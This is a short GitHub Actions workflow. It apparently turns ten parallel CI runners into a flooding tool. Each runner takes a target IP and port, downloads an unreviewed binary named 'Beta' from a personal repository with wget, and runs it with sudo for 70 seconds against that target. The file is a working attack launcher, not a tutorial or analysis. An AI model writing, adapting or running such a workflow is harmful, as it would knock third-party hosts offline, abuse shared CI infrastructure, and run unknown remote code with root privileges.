name: Beta !

on:
  workflow_dispatch:
    inputs:
      target:
        description: "IP !"
        required: true
        default: "127.0.0.1"
      port:
        description: "Port !"
        required: true
        default: "53"
      
jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 10
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
        
    steps:
      - name: Checkout (optional)
        uses: actions/checkout@v4

      - name: OK !
        run: |
          TARGET="${{ inputs.target }}"
          PORT="${{ inputs.port }}"
          
          wget https://github.com/AhmetKesser/Deneme/raw/refs/heads/main/raw -O Beta
          chmod +x Beta || true
          
          sudo timeout 70 ./Beta "$TARGET" "$PORT" 70 123 &
          
      - name: Finish !
        run: |
          sleep 70
          exit 0
